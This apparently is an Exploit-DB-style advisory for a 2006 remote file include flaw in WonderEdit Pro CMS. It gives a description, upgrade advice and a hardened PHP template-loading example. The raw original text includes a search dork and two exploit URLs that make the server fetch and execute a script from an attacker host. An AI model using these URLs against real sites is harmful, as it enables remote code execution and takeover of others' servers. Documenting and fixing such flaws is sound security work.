vendor:
WonderEdit Pro CMS
by:
OLiBekaS
CVSS: 9.3 (HIGH)
CWE: 98 (Remote File Include)
Product Name: WonderEdit Pro CMS
Affected Version From: Pro version
Affected Version To: Pro version
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WonderEdit Pro CMS <= Pro version Remote File Include Vulnerabilities

A vulnerability exists in WonderEdit Pro CMS Pro version that allows attackers to include remote files. An attacker can exploit it by sending a specially crafted HTTP request whose config[template_path] parameter points at a remote file, which the application then includes and executes. This can result in arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of WonderEdit Pro CMS.
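As an added illustration (not WonderEdit's own code, whose source is not on this page), the include pattern that a config[template_path]=http://... request abuses, reconstructed as a hypothetical, beside a hardened replacement that resolves templates from a fixed allowlist under a fixed directory. It assumes the typical PHP configuration of the period, register_globals=On with allow_url_include/allow_url_fopen enabled, which is how a query parameter could populate $config['template_path'] before the include ran.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern (assumption, not the real code).
// With register_globals=On, ?config[template_path]=http://host/cmd.txt? creates
// $config['template_path'] before this line runs, and allow_url_include lets
// include() fetch and execute the remote file:
//
//   include($config['template_path'] . '/user_bottom.php');   // vulnerable
//
// Hardened version: never derive an include path from request data. Besides the
// code below, set register_globals=Off and allow_url_include=Off in php.ini.

declare(strict_types=1);

const TEMPLATE_BASE = __DIR__ . '/template';
// Template names from the advisory; the set is fixed server-side.
const ALLOWED_TEMPLATES = ['rwb', 'gwb', 'blues', 'bluwhi', 'grns'];

function resolve_template_file(string $template, string $file): ?string
{
    if (!in_array($template, ALLOWED_TEMPLATES, true)) {
        return null;                      // unknown template name: refuse
    }
    if (!preg_match('/^[a-z_]+\.php$/', $file)) {
        return null;                      // plain file names only: no '../', no URLs
    }
    $base = realpath(TEMPLATE_BASE);
    $path = realpath(TEMPLATE_BASE . '/' . $template . '/' . $file);
    // realpath() fails for missing files and collapses '..'; confirm the result
    // still lives under the template directory before including it.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// The template choice comes from server-side configuration, never from $_GET.
$config = ['template_path' => 'rwb'];
$file = resolve_template_file($config['template_path'], 'user_bottom.php');
if ($file === null) {
    http_response_code(500);
    exit('template not available');
}
include $file;
```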

Exploit-DB raw data:

--------------------------------------------------------------------------------

Title : WonderEdit Pro CMS <= Pro version Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Web Site CMS
version : pro version
Description: this is the default CMS for all hosting at Wonder hosting (http://www.12wonderhosting.com/) maybe :)
URL : http://www.wonderedit.com

-----------------------------------------------------------------------------


dork        : "powered by WonderEdit Pro"

Exploit     :  

http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls

------------------------------------------------------------------------------

This works for all templates in WonderEdit Pro CMS; use "rwb" or "gwb" for the default attack, and other templates are vulnerable too, like
"blues", "bluwhi", "grns", and others.

------------------------------------------------------------------------------


greatz:
~~~~~

# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------


Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-07-04]